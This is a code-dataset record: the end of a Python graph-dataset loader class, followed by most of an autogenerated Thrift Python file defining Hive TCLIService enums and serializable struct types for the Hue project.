if self.verbose:
self.print_files(self.raw_paths)
print("Downloading completed.")
def process(self):
print("Processing...")
graph = load_dataset(
self.raw_paths[0]).eliminate_selfloops().to_undirected()
if self.standardize:
graph = graph.standardize()
self.graph = graph
print("Processing completed.")
@property
def url(self):
if isinstance(self._url, str):
return self._url
else:
return self.github_url.format(self.name)
@property
def raw_paths(self):
return [f"{osp.join(self.download_dir, self.name)}.npz"]
| [
"[email protected]"
] | |
2f3dc9b1091c9ce8bf8b3f455db007cea527544b | f55ed49e77f2983f9118a5228a0f6d777c4eac97 | /apps/beeswax/gen-py/TCLIService/ttypes.py | 78d1609bf3c6ecb2180d62fcf47162e7936e3d04 | [
"Apache-2.0"
] | permissive | mravi/hue | feb8543e1490fdbfdaff069c021ae168f72b28c6 | 1190bc41c560edf239c5dfc9689d25f3b4b3ab95 | refs/heads/master | 2020-12-25T21:55:41.294305 | 2013-11-07T11:49:05 | 2013-11-08T01:36:42 | 14,227,040 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | true | 169,041 | py | #
# Autogenerated by Thrift Compiler (0.9.0)
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
# options string: py:new_style
#
from thrift.Thrift import TType, TMessageType, TException, TApplicationException
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol, TProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class TProtocolVersion(object):
HIVE_CLI_SERVICE_PROTOCOL_V1 = 0
HIVE_CLI_SERVICE_PROTOCOL_V2 = 1
_VALUES_TO_NAMES = {
0: "HIVE_CLI_SERVICE_PROTOCOL_V1",
1: "HIVE_CLI_SERVICE_PROTOCOL_V2",
}
_NAMES_TO_VALUES = {
"HIVE_CLI_SERVICE_PROTOCOL_V1": 0,
"HIVE_CLI_SERVICE_PROTOCOL_V2": 1,
}
class TTypeId(object):
BOOLEAN_TYPE = 0
TINYINT_TYPE = 1
SMALLINT_TYPE = 2
INT_TYPE = 3
BIGINT_TYPE = 4
FLOAT_TYPE = 5
DOUBLE_TYPE = 6
STRING_TYPE = 7
TIMESTAMP_TYPE = 8
BINARY_TYPE = 9
ARRAY_TYPE = 10
MAP_TYPE = 11
STRUCT_TYPE = 12
UNION_TYPE = 13
USER_DEFINED_TYPE = 14
DECIMAL_TYPE = 15
NULL_TYPE = 16
DATE_TYPE = 17
_VALUES_TO_NAMES = {
0: "BOOLEAN_TYPE",
1: "TINYINT_TYPE",
2: "SMALLINT_TYPE",
3: "INT_TYPE",
4: "BIGINT_TYPE",
5: "FLOAT_TYPE",
6: "DOUBLE_TYPE",
7: "STRING_TYPE",
8: "TIMESTAMP_TYPE",
9: "BINARY_TYPE",
10: "ARRAY_TYPE",
11: "MAP_TYPE",
12: "STRUCT_TYPE",
13: "UNION_TYPE",
14: "USER_DEFINED_TYPE",
15: "DECIMAL_TYPE",
16: "NULL_TYPE",
17: "DATE_TYPE",
}
_NAMES_TO_VALUES = {
"BOOLEAN_TYPE": 0,
"TINYINT_TYPE": 1,
"SMALLINT_TYPE": 2,
"INT_TYPE": 3,
"BIGINT_TYPE": 4,
"FLOAT_TYPE": 5,
"DOUBLE_TYPE": 6,
"STRING_TYPE": 7,
"TIMESTAMP_TYPE": 8,
"BINARY_TYPE": 9,
"ARRAY_TYPE": 10,
"MAP_TYPE": 11,
"STRUCT_TYPE": 12,
"UNION_TYPE": 13,
"USER_DEFINED_TYPE": 14,
"DECIMAL_TYPE": 15,
"NULL_TYPE": 16,
"DATE_TYPE": 17,
}
class TStatusCode(object):
SUCCESS_STATUS = 0
SUCCESS_WITH_INFO_STATUS = 1
STILL_EXECUTING_STATUS = 2
ERROR_STATUS = 3
INVALID_HANDLE_STATUS = 4
_VALUES_TO_NAMES = {
0: "SUCCESS_STATUS",
1: "SUCCESS_WITH_INFO_STATUS",
2: "STILL_EXECUTING_STATUS",
3: "ERROR_STATUS",
4: "INVALID_HANDLE_STATUS",
}
_NAMES_TO_VALUES = {
"SUCCESS_STATUS": 0,
"SUCCESS_WITH_INFO_STATUS": 1,
"STILL_EXECUTING_STATUS": 2,
"ERROR_STATUS": 3,
"INVALID_HANDLE_STATUS": 4,
}
class TOperationState(object):
INITIALIZED_STATE = 0
RUNNING_STATE = 1
FINISHED_STATE = 2
CANCELED_STATE = 3
CLOSED_STATE = 4
ERROR_STATE = 5
UKNOWN_STATE = 6
PENDING_STATE = 7
_VALUES_TO_NAMES = {
0: "INITIALIZED_STATE",
1: "RUNNING_STATE",
2: "FINISHED_STATE",
3: "CANCELED_STATE",
4: "CLOSED_STATE",
5: "ERROR_STATE",
6: "UKNOWN_STATE",
7: "PENDING_STATE",
}
_NAMES_TO_VALUES = {
"INITIALIZED_STATE": 0,
"RUNNING_STATE": 1,
"FINISHED_STATE": 2,
"CANCELED_STATE": 3,
"CLOSED_STATE": 4,
"ERROR_STATE": 5,
"UKNOWN_STATE": 6,
"PENDING_STATE": 7,
}
class TOperationType(object):
EXECUTE_STATEMENT = 0
GET_TYPE_INFO = 1
GET_CATALOGS = 2
GET_SCHEMAS = 3
GET_TABLES = 4
GET_TABLE_TYPES = 5
GET_COLUMNS = 6
GET_FUNCTIONS = 7
UNKNOWN = 8
_VALUES_TO_NAMES = {
0: "EXECUTE_STATEMENT",
1: "GET_TYPE_INFO",
2: "GET_CATALOGS",
3: "GET_SCHEMAS",
4: "GET_TABLES",
5: "GET_TABLE_TYPES",
6: "GET_COLUMNS",
7: "GET_FUNCTIONS",
8: "UNKNOWN",
}
_NAMES_TO_VALUES = {
"EXECUTE_STATEMENT": 0,
"GET_TYPE_INFO": 1,
"GET_CATALOGS": 2,
"GET_SCHEMAS": 3,
"GET_TABLES": 4,
"GET_TABLE_TYPES": 5,
"GET_COLUMNS": 6,
"GET_FUNCTIONS": 7,
"UNKNOWN": 8,
}
class TGetInfoType(object):
CLI_MAX_DRIVER_CONNECTIONS = 0
CLI_MAX_CONCURRENT_ACTIVITIES = 1
CLI_DATA_SOURCE_NAME = 2
CLI_FETCH_DIRECTION = 8
CLI_SERVER_NAME = 13
CLI_SEARCH_PATTERN_ESCAPE = 14
CLI_DBMS_NAME = 17
CLI_DBMS_VER = 18
CLI_ACCESSIBLE_TABLES = 19
CLI_ACCESSIBLE_PROCEDURES = 20
CLI_CURSOR_COMMIT_BEHAVIOR = 23
CLI_DATA_SOURCE_READ_ONLY = 25
CLI_DEFAULT_TXN_ISOLATION = 26
CLI_IDENTIFIER_CASE = 28
CLI_IDENTIFIER_QUOTE_CHAR = 29
CLI_MAX_COLUMN_NAME_LEN = 30
CLI_MAX_CURSOR_NAME_LEN = 31
CLI_MAX_SCHEMA_NAME_LEN = 32
CLI_MAX_CATALOG_NAME_LEN = 34
CLI_MAX_TABLE_NAME_LEN = 35
CLI_SCROLL_CONCURRENCY = 43
CLI_TXN_CAPABLE = 46
CLI_USER_NAME = 47
CLI_TXN_ISOLATION_OPTION = 72
CLI_INTEGRITY = 73
CLI_GETDATA_EXTENSIONS = 81
CLI_NULL_COLLATION = 85
CLI_ALTER_TABLE = 86
CLI_ORDER_BY_COLUMNS_IN_SELECT = 90
CLI_SPECIAL_CHARACTERS = 94
CLI_MAX_COLUMNS_IN_GROUP_BY = 97
CLI_MAX_COLUMNS_IN_INDEX = 98
CLI_MAX_COLUMNS_IN_ORDER_BY = 99
CLI_MAX_COLUMNS_IN_SELECT = 100
CLI_MAX_COLUMNS_IN_TABLE = 101
CLI_MAX_INDEX_SIZE = 102
CLI_MAX_ROW_SIZE = 104
CLI_MAX_STATEMENT_LEN = 105
CLI_MAX_TABLES_IN_SELECT = 106
CLI_MAX_USER_NAME_LEN = 107
CLI_OJ_CAPABILITIES = 115
CLI_XOPEN_CLI_YEAR = 10000
CLI_CURSOR_SENSITIVITY = 10001
CLI_DESCRIBE_PARAMETER = 10002
CLI_CATALOG_NAME = 10003
CLI_COLLATION_SEQ = 10004
CLI_MAX_IDENTIFIER_LEN = 10005
_VALUES_TO_NAMES = {
0: "CLI_MAX_DRIVER_CONNECTIONS",
1: "CLI_MAX_CONCURRENT_ACTIVITIES",
2: "CLI_DATA_SOURCE_NAME",
8: "CLI_FETCH_DIRECTION",
13: "CLI_SERVER_NAME",
14: "CLI_SEARCH_PATTERN_ESCAPE",
17: "CLI_DBMS_NAME",
18: "CLI_DBMS_VER",
19: "CLI_ACCESSIBLE_TABLES",
20: "CLI_ACCESSIBLE_PROCEDURES",
23: "CLI_CURSOR_COMMIT_BEHAVIOR",
25: "CLI_DATA_SOURCE_READ_ONLY",
26: "CLI_DEFAULT_TXN_ISOLATION",
28: "CLI_IDENTIFIER_CASE",
29: "CLI_IDENTIFIER_QUOTE_CHAR",
30: "CLI_MAX_COLUMN_NAME_LEN",
31: "CLI_MAX_CURSOR_NAME_LEN",
32: "CLI_MAX_SCHEMA_NAME_LEN",
34: "CLI_MAX_CATALOG_NAME_LEN",
35: "CLI_MAX_TABLE_NAME_LEN",
43: "CLI_SCROLL_CONCURRENCY",
46: "CLI_TXN_CAPABLE",
47: "CLI_USER_NAME",
72: "CLI_TXN_ISOLATION_OPTION",
73: "CLI_INTEGRITY",
81: "CLI_GETDATA_EXTENSIONS",
85: "CLI_NULL_COLLATION",
86: "CLI_ALTER_TABLE",
90: "CLI_ORDER_BY_COLUMNS_IN_SELECT",
94: "CLI_SPECIAL_CHARACTERS",
97: "CLI_MAX_COLUMNS_IN_GROUP_BY",
98: "CLI_MAX_COLUMNS_IN_INDEX",
99: "CLI_MAX_COLUMNS_IN_ORDER_BY",
100: "CLI_MAX_COLUMNS_IN_SELECT",
101: "CLI_MAX_COLUMNS_IN_TABLE",
102: "CLI_MAX_INDEX_SIZE",
104: "CLI_MAX_ROW_SIZE",
105: "CLI_MAX_STATEMENT_LEN",
106: "CLI_MAX_TABLES_IN_SELECT",
107: "CLI_MAX_USER_NAME_LEN",
115: "CLI_OJ_CAPABILITIES",
10000: "CLI_XOPEN_CLI_YEAR",
10001: "CLI_CURSOR_SENSITIVITY",
10002: "CLI_DESCRIBE_PARAMETER",
10003: "CLI_CATALOG_NAME",
10004: "CLI_COLLATION_SEQ",
10005: "CLI_MAX_IDENTIFIER_LEN",
}
_NAMES_TO_VALUES = {
"CLI_MAX_DRIVER_CONNECTIONS": 0,
"CLI_MAX_CONCURRENT_ACTIVITIES": 1,
"CLI_DATA_SOURCE_NAME": 2,
"CLI_FETCH_DIRECTION": 8,
"CLI_SERVER_NAME": 13,
"CLI_SEARCH_PATTERN_ESCAPE": 14,
"CLI_DBMS_NAME": 17,
"CLI_DBMS_VER": 18,
"CLI_ACCESSIBLE_TABLES": 19,
"CLI_ACCESSIBLE_PROCEDURES": 20,
"CLI_CURSOR_COMMIT_BEHAVIOR": 23,
"CLI_DATA_SOURCE_READ_ONLY": 25,
"CLI_DEFAULT_TXN_ISOLATION": 26,
"CLI_IDENTIFIER_CASE": 28,
"CLI_IDENTIFIER_QUOTE_CHAR": 29,
"CLI_MAX_COLUMN_NAME_LEN": 30,
"CLI_MAX_CURSOR_NAME_LEN": 31,
"CLI_MAX_SCHEMA_NAME_LEN": 32,
"CLI_MAX_CATALOG_NAME_LEN": 34,
"CLI_MAX_TABLE_NAME_LEN": 35,
"CLI_SCROLL_CONCURRENCY": 43,
"CLI_TXN_CAPABLE": 46,
"CLI_USER_NAME": 47,
"CLI_TXN_ISOLATION_OPTION": 72,
"CLI_INTEGRITY": 73,
"CLI_GETDATA_EXTENSIONS": 81,
"CLI_NULL_COLLATION": 85,
"CLI_ALTER_TABLE": 86,
"CLI_ORDER_BY_COLUMNS_IN_SELECT": 90,
"CLI_SPECIAL_CHARACTERS": 94,
"CLI_MAX_COLUMNS_IN_GROUP_BY": 97,
"CLI_MAX_COLUMNS_IN_INDEX": 98,
"CLI_MAX_COLUMNS_IN_ORDER_BY": 99,
"CLI_MAX_COLUMNS_IN_SELECT": 100,
"CLI_MAX_COLUMNS_IN_TABLE": 101,
"CLI_MAX_INDEX_SIZE": 102,
"CLI_MAX_ROW_SIZE": 104,
"CLI_MAX_STATEMENT_LEN": 105,
"CLI_MAX_TABLES_IN_SELECT": 106,
"CLI_MAX_USER_NAME_LEN": 107,
"CLI_OJ_CAPABILITIES": 115,
"CLI_XOPEN_CLI_YEAR": 10000,
"CLI_CURSOR_SENSITIVITY": 10001,
"CLI_DESCRIBE_PARAMETER": 10002,
"CLI_CATALOG_NAME": 10003,
"CLI_COLLATION_SEQ": 10004,
"CLI_MAX_IDENTIFIER_LEN": 10005,
}
class TFetchOrientation(object):
FETCH_NEXT = 0
FETCH_PRIOR = 1
FETCH_RELATIVE = 2
FETCH_ABSOLUTE = 3
FETCH_FIRST = 4
FETCH_LAST = 5
_VALUES_TO_NAMES = {
0: "FETCH_NEXT",
1: "FETCH_PRIOR",
2: "FETCH_RELATIVE",
3: "FETCH_ABSOLUTE",
4: "FETCH_FIRST",
5: "FETCH_LAST",
}
_NAMES_TO_VALUES = {
"FETCH_NEXT": 0,
"FETCH_PRIOR": 1,
"FETCH_RELATIVE": 2,
"FETCH_ABSOLUTE": 3,
"FETCH_FIRST": 4,
"FETCH_LAST": 5,
}
class TPrimitiveTypeEntry(object):
"""
Attributes:
- type
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'type', None, None, ), # 1
)
def __init__(self, type=None,):
self.type = type
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.type = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TPrimitiveTypeEntry')
if self.type is not None:
oprot.writeFieldBegin('type', TType.I32, 1)
oprot.writeI32(self.type)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.type is None:
raise TProtocol.TProtocolException(message='Required field type is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TArrayTypeEntry(object):
"""
Attributes:
- objectTypePtr
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'objectTypePtr', None, None, ), # 1
)
def __init__(self, objectTypePtr=None,):
self.objectTypePtr = objectTypePtr
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.objectTypePtr = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TArrayTypeEntry')
if self.objectTypePtr is not None:
oprot.writeFieldBegin('objectTypePtr', TType.I32, 1)
oprot.writeI32(self.objectTypePtr)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.objectTypePtr is None:
raise TProtocol.TProtocolException(message='Required field objectTypePtr is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TMapTypeEntry(object):
"""
Attributes:
- keyTypePtr
- valueTypePtr
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'keyTypePtr', None, None, ), # 1
(2, TType.I32, 'valueTypePtr', None, None, ), # 2
)
def __init__(self, keyTypePtr=None, valueTypePtr=None,):
self.keyTypePtr = keyTypePtr
self.valueTypePtr = valueTypePtr
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.keyTypePtr = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.valueTypePtr = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TMapTypeEntry')
if self.keyTypePtr is not None:
oprot.writeFieldBegin('keyTypePtr', TType.I32, 1)
oprot.writeI32(self.keyTypePtr)
oprot.writeFieldEnd()
if self.valueTypePtr is not None:
oprot.writeFieldBegin('valueTypePtr', TType.I32, 2)
oprot.writeI32(self.valueTypePtr)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.keyTypePtr is None:
raise TProtocol.TProtocolException(message='Required field keyTypePtr is unset!')
if self.valueTypePtr is None:
raise TProtocol.TProtocolException(message='Required field valueTypePtr is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TStructTypeEntry(object):
"""
Attributes:
- nameToTypePtr
"""
thrift_spec = (
None, # 0
(1, TType.MAP, 'nameToTypePtr', (TType.STRING,None,TType.I32,None), None, ), # 1
)
def __init__(self, nameToTypePtr=None,):
self.nameToTypePtr = nameToTypePtr
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.nameToTypePtr = {}
(_ktype1, _vtype2, _size0 ) = iprot.readMapBegin()
for _i4 in xrange(_size0):
_key5 = iprot.readString();
_val6 = iprot.readI32();
self.nameToTypePtr[_key5] = _val6
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TStructTypeEntry')
if self.nameToTypePtr is not None:
oprot.writeFieldBegin('nameToTypePtr', TType.MAP, 1)
oprot.writeMapBegin(TType.STRING, TType.I32, len(self.nameToTypePtr))
for kiter7,viter8 in self.nameToTypePtr.items():
oprot.writeString(kiter7)
oprot.writeI32(viter8)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.nameToTypePtr is None:
raise TProtocol.TProtocolException(message='Required field nameToTypePtr is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TUnionTypeEntry(object):
"""
Attributes:
- nameToTypePtr
"""
thrift_spec = (
None, # 0
(1, TType.MAP, 'nameToTypePtr', (TType.STRING,None,TType.I32,None), None, ), # 1
)
def __init__(self, nameToTypePtr=None,):
self.nameToTypePtr = nameToTypePtr
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.MAP:
self.nameToTypePtr = {}
(_ktype10, _vtype11, _size9 ) = iprot.readMapBegin()
for _i13 in xrange(_size9):
_key14 = iprot.readString();
_val15 = iprot.readI32();
self.nameToTypePtr[_key14] = _val15
iprot.readMapEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TUnionTypeEntry')
if self.nameToTypePtr is not None:
oprot.writeFieldBegin('nameToTypePtr', TType.MAP, 1)
oprot.writeMapBegin(TType.STRING, TType.I32, len(self.nameToTypePtr))
for kiter16,viter17 in self.nameToTypePtr.items():
oprot.writeString(kiter16)
oprot.writeI32(viter17)
oprot.writeMapEnd()
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.nameToTypePtr is None:
raise TProtocol.TProtocolException(message='Required field nameToTypePtr is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TUserDefinedTypeEntry(object):
"""
Attributes:
- typeClassName
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'typeClassName', None, None, ), # 1
)
def __init__(self, typeClassName=None,):
self.typeClassName = typeClassName
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.typeClassName = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TUserDefinedTypeEntry')
if self.typeClassName is not None:
oprot.writeFieldBegin('typeClassName', TType.STRING, 1)
oprot.writeString(self.typeClassName)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
if self.typeClassName is None:
raise TProtocol.TProtocolException(message='Required field typeClassName is unset!')
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TTypeEntry(object):
"""
Attributes:
- primitiveEntry
- arrayEntry
- mapEntry
- structEntry
- unionEntry
- userDefinedTypeEntry
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'primitiveEntry', (TPrimitiveTypeEntry, TPrimitiveTypeEntry.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'arrayEntry', (TArrayTypeEntry, TArrayTypeEntry.thrift_spec), None, ), # 2
(3, TType.STRUCT, 'mapEntry', (TMapTypeEntry, TMapTypeEntry.thrift_spec), None, ), # 3
(4, TType.STRUCT, 'structEntry', (TStructTypeEntry, TStructTypeEntry.thrift_spec), None, ), # 4
(5, TType.STRUCT, 'unionEntry', (TUnionTypeEntry, TUnionTypeEntry.thrift_spec), None, ), # 5
(6, TType.STRUCT, 'userDefinedTypeEntry', (TUserDefinedTypeEntry, TUserDefinedTypeEntry.thrift_spec), None, ), # 6
)
def __init__(self, primitiveEntry=None, arrayEntry=None, mapEntry=None, structEntry=None, unionEntry=None, userDefinedTypeEntry=None,):
self.primitiveEntry = primitiveEntry
self.arrayEntry = arrayEntry
self.mapEntry = mapEntry
self.structEntry = structEntry
self.unionEntry = unionEntry
self.userDefinedTypeEntry = userDefinedTypeEntry
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.primitiveEntry = TPrimitiveTypeEntry()
self.primitiveEntry.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.arrayEntry = TArrayTypeEntry()
self.arrayEntry.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRUCT:
self.mapEntry = TMapTypeEntry()
self.mapEntry.read(iprot)
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.structEntry = TStructTypeEntry()
self.structEntry.read(iprot)
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRUCT:
self.unionEntry = TUnionTypeEntry()
self.unionEntry.read(iprot)
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRUCT:
self.userDefinedTypeEntry = TUserDefinedTypeEntry()
self.userDefinedTypeEntry.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TTypeEntry')
if self.primitiveEntry is not None:
oprot.writeFieldBegin('primitiveEntry', TType.STRUCT, 1)
self.primitiveEntry.write(oprot)
oprot.writeFieldEnd()
if self.arrayEntry is not None:
oprot.writeFieldBegin('arrayEntry', TType.STRUCT, 2)
self.arrayEntry.write(oprot)
oprot.writeFieldEnd()
if self.mapEntry is not None:
oprot.writeFieldBegin('mapEntry', TType.STRUCT, 3)
self.mapEntry.write(oprot)
oprot.writeFieldEnd()
if self.structEntry is not None:
oprot.writeFieldBegin('structEntry', TType.STRUCT, 4)
self.structEntry.write(oprot)
oprot.writeFieldEnd()
if self.unionEntry is not None:
oprot.writeFieldBegin('unionEntry', TType.STRUCT, 5)
self.unionEntry.write(oprot)
oprot.writeFieldEnd()
if self.userDefinedTypeEntry is not None:
oprot.writeFieldBegin('userDefinedTypeEntry', TType.STRUCT, 6)
self.userDefinedTypeEntry.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class TTypeDesc(object):
"""
Attributes:
- types
"""
thrift_spec = (
None, # 0
(1, TType.LIST, 'types', (TType.STRUCT,(TTypeEntry, TTypeEntry.thrift_spec)), None, ), # 1
)
def __init__(self, types=None,):
self.types = types
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.LIST:
self.types = []
(_etype21, _size18) = iprot.readListBegin()
for _i22 in xrange(_size18):
_elem23 = TTypeEntry()
_elem23.read(iprot)
self.types.append(_elem23)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('TTypeDesc')
if self.types is not None:
oprot.writeFieldBegin('types', TType.LIST, 1)
oprot.writeListBegin(TType.STRUCT, len(self.types))
for iter24 in self.types:
